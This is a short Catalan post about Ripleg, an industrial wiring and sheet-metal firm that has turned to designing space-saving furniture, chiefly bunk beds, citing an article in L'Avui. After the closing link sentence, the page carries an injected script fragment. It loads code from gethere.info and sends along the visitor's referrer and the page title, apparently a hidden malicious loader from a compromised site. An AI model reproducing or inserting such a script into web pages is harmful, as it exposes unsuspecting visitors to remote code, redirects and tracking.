Buscant alternatives de negoci: el cas Ripleg

La situació econòmica convida els empresaris a buscar alternatives de negoci que permetin generar nous ingressos.

Aquest és el cas de Ripleg, una empresa dedicada des del 1988,a la enginyeria, mecanització de planxa i confecció de cablejats elèctrics a nivell industrial. Actualment han  desenvolupat una línia de mobiliari de disseny per donar solucions a espais reduïts i en la qual la llitera és el producte principal.

En aquest article publicat a L’Avui, els germans Batlle reconeixen que mai no haurien imaginat dedicar part de la seva producció al disseny i muntatge de lliteres. “Són circumstàncies de la vida que et porten fins aquí. Es tracta de no parar”, diuen ambdós.

Podeu llegir l’article sencer aquí.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

A Manlleu
Fem Xarxa